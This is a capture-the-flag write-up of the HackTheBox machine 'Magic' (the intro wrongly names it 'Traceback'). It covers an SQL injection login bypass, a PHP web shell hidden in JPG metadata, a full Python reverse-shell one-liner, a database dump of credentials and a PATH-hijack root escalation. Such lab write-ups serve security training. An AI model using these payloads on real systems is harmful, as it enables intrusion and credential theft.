HackTheBox — Magic
Hack the Box is an online platform where you can practice your penetration testing skills. This is my write-up for the HackTheBox machine ‘Traceback’, which runs a Linux OS and is one of the ‘Easy’ rated machines.
Summary
To gain a foothold we bypass the web app authentication using SQLi and then upload a malicious JPG file to achieve code execution, which lets us get a reverse shell. Enumerating the local web directory we find database credentials for the user ‘theseus’, which allows us to dump the DB which contains theseus’ user account password. Finally, to get root we perform a PATH hijacking exploit on a custom ‘sysinfo’ SUID-enabled binary.
1. Enumeration and Initial Foothold (www-data)
I began my enumeration by running an Nmap scan.
# Nmap 7.80 scan initiated as: nmap -sV -sC 10.10.10.185
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOnly SSH and HTTP open, so let’s focus on the web app. Opening up Firefox we can see the web app, which is heavily image-based, along with a login option in the bottom left.
Before diving into the login form, I ran some directory enumeration with wfuzz. This found the URL path (below) where all the images are located on the server.
http://10.10.10.185/images/uploads/<file_name>.jpgSQl Injection (SQLi) Authentication Bypass: Now enumerating the login, I tried some default credentials but these didn’t work. However, when inserting a single ' I didn't get the same error message, hinting at some possible SQLi. Opening up BurpSuite to capture the request and using a basic SQLi authentication bypass payload, we get redirected to the upload form.
Malicious Image Upload → RCE: Pressing upload with no attachment shows us the permitted file types, namely: JPG, JPEG and PNG.
We can manipulate an image’s exif data and embed PHP code using ‘Exiftool’ with the code below, which if successful will let us run system commands on the server from the browser URL by appending ?cmd=<command> to our image file.
exiftool -Comment='<?php system($_REQUEST['cmd']); ?>' <file_name>.jpgFor this I downloaded a random jpg file and named it run.jpg, embedded the malicious PHP code from above, and then renamed it run.php.jpg for it to be able to bypass the upload filter.
After uploading it through the web app, going to the URL where images are located (see above), we can confirm we have remote code execution.
Swapping the command ‘ls -la’ for a python3 reverse shell, we have our foothold as www-data!
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.17.13",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
2. User Shell
As mentioned in previous writeups, if I get a foothold as www-data I always enumerate the web directories for database files or other files that may contain credentials.
User Credentials via Magic DB Dump: This proved to be a good strategy as in the /var/www/Magic/ directory there was a database config file ‘db.php5’, which contains database credentials.
‘theseus’ is also a user on this box but trying these credentials to login fails. Perhaps we can extract details surrounding the Magic database with these credentials? Luckily the tool ‘mysqldump’ is installed on the box and we can use this.
:/var/www/Magic$ mysqldump -u theseus -p iamkingtheseus Magic
Awesome! Some more credentials for ‘theseus’, maybe this time we can log in?
And we get user.txt, on to root!
3. Root
Moving LinPeas.sh over to the box and running it revealed a non-standard SUID binary, called ‘sysinfo’. Running this binary we can see gives us, as expected, various system information (cut down).
The ‘sysinfo’ binary outputs system information using four main binary calls. The information and corresponding command to achieve such information are:
- Hardware Info =
lshw -short - Disk Info =
fdisk -l - CPU Info =
cat /proc/cpuinfo - MEM Usage =
free -h
This can be seen by analyzing the binary with the ‘strings’ tool (excluding any files beginning with _ for readability).
Path Hijacking Privilege Escalation: As we can see, the calls to these binaries are relative and therefore we can perform a PATH hijacking exploit. That is, we can make the ‘sysinfo’ binary point to our created malicious file during execution rather than the actual intended binaries. This is well explained in Raj Chandel’s blog post.
Additionally, I’ve recently completed a really cool TryHackMe Room dedicated to PATH hijacking exploits so be sure to check that out!
Since the ‘sysinfo’ binary has an SUID bit set it will execute as root and therefore if our malicious file contains reverse shell code, we will get a shell as root! The full exploit is explained and then shown below.
1 | touch /tmp/lshw : Creating our malicious file with the same name as the intended 'lshw' binary in the /tmp directory.2 | nano lshw : Using nano to insert Python3 reverse shell code.3 | cat lshw : Confirming our reverse shell code was correct.4 | chmod 755 lshw : Giving our malicious file read and execute permissions.5 | export PATH=/tmp:$PATH : Altering the $PATH variable to point to our malicious 'lshw' in the /tmp directory.6 | nc -lvnp 9999: Opening a netcat listener on port 9999 in a new (local) terminal.7 | sysinfo : executing the SUID binary and catching the connection.
Executing this will a netcat listener open on the correct port gives us a root shell and the root flag!
Conclusion
Thanks for reading and keep an eye out for future writeups! Feedback is always welcome through, and my HackTheBox profile is linked below :)
